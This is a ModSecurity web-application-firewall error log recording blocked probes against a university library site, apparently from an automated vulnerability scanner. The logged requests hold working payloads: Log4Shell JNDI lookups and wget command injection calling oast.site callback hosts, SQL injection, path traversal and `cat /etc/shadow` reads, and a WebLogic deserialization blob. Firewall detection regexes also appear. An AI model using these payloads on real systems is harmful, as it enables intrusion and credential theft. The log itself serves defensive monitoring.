[Tue Aug 29 11:34:10.372527 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAShCVoAAAAi"]
[Tue Aug 29 11:34:11.306868 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAARQ4GgAAAAB"]
[Tue Aug 29 11:34:11.402278 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgq9nhnzhbff8ok.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgq9nhnzhbff8ok.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgpat8xz7waqdfd.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASQqA0AAAAT"]
[Tue Aug 29 11:34:12.329208 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAARQ4G4AAAAB"]
[Tue Aug 29 11:34:13.313737 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASPDKYAAAAS"]
[Tue Aug 29 11:34:15.347494 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlggtuje97ymuwom.oast.site found within TX:1: cjmn8l5jmimk2adbbnlggtuje97ymuwom.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASK4fYAAAAI"]
[Tue Aug 29 11:34:15.369199 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASNzqMAAAAQ"]
[Tue Aug 29 11:34:16.347844 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASEJUQAAAAE"]
[Tue Aug 29 11:34:16.371469 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASHh7wAAAAD"]
[Tue Aug 29 11:34:16.383121 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilib.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASS7@4AAAAY"]
[Tue Aug 29 11:34:16.383152 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASS7@4AAAAY"]
[Tue Aug 29 11:34:17.331541 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAAPLwHcAAAAX"]
[Tue Aug 29 11:34:19.412223 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASEJVcAAAAE"]
[Tue Aug 29 11:34:19.430806 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgs46yjm9c53g8n.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASEJVgAAAAE"]
[Tue Aug 29 11:34:19.430839 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASI0CsAAAAG"]
[Tue Aug 29 11:34:23.634914 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASK4hEAAAAI"]
[Tue Aug 29 11:34:23.700288 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASS8AgAAAAY"]
[Tue Aug 29 11:34:25.488423 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "digilib.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAAT2JO4AAAAz"]
[Tue Aug 29 11:34:26.128425 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATqf6oAAAAu"]
[Tue Aug 29 11:34:26.327850 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAT@Kt8AAAA2"]
[Tue Aug 29 11:34:26.337133 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgr8nz6nykybnk9.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAATovl0AAAAt"]
[Tue Aug 29 11:34:27.416750 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUdm2gAAABS"]
[Tue Aug 29 11:34:28.230871 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilib.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAAUR82oAAABI"]
[Tue Aug 29 11:34:29.325423 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUeP7oAAABT"]
[Tue Aug 29 11:34:29.348318 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlg1wbcmrgagfhry.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAAShCYYAAAAi"]
[Tue Aug 29 11:34:29.506985 2023] [:error] [pid 1304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAUYm7wAAABN"]
[Tue Aug 29 11:34:29.508852 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgzgxajwem9eqxt.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAAUa3BMAAABP"]
[Tue Aug 29 11:34:30.387108 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlghjodqk5eeykm9.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATzVHMAAAAx"]
[Tue Aug 29 11:34:31.420096 2023] [:error] [pid 1252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATkXrMAAAAp"]
[Tue Aug 29 11:34:32.320417 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAATavtoAAAAg"]
